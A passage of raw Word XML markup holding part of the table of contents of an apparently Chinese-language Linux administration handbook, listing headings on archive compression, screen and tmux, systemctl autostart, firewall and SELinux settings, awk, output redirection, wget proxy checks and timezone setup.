          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79657EF0" w14:textId="52921562" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779679" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>tar.gz</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>（或</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>.tgz</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>）的压缩与解压缩</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779679 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>168</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45C3BC0B" w14:textId="52C06F73" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779680" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>tar.bz2</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的压缩与解压缩</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779680 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>168</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0111B968" w14:textId="00CB581A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779681" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>tar.Z</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的压缩与解压缩</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779681 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>168</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2002823B" w14:textId="45DF4E7E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779682" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>zip</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的压缩与解压缩</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779682 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>168</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B4AD4CC" w14:textId="61DF23B9" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779683" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>rar</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的压缩与解压缩</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779683 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>169</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20D26067" w14:textId="382AAF26" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779684" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>screen</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的命令不会立即出现在</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>.bash_history</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779684 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>169</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41C919C9" w14:textId="622B6E98" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779685" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>tmux:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>类似于</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>screen</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的虚拟终端</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779685 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>170</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AEF055A" w14:textId="3CFFEB79" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779686" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>开机自启动：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>systemctl</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>service</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779686 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>172</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EAD413D" w14:textId="5764A3F2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779687" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>防火墙操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779687 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>174</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77AC7814" w14:textId="4667FCE7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779688" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>selinux</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的处理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779688 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>179</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E879CF0" w14:textId="39931294" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779689" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>用户操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779689 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>179</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="239C7ED4" w14:textId="6B4C5B65" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779690" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>持续监控显卡占用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779690 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>181</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45BA441C" w14:textId="352D95B6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779691" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>awk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779691 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>181</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15D3CFC0" w14:textId="4AE0687E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779692" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>标准输出和标准错误的重定向</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779692 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>181</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79D5A99A" w14:textId="78B8BE33" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779693" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>代理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779693 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>182</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14D86346" w14:textId="50E40DF6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779694" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>调整时间为北京时间</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779694 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>182</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C651E50" w14:textId="605E408B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779695" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CST</w:t>
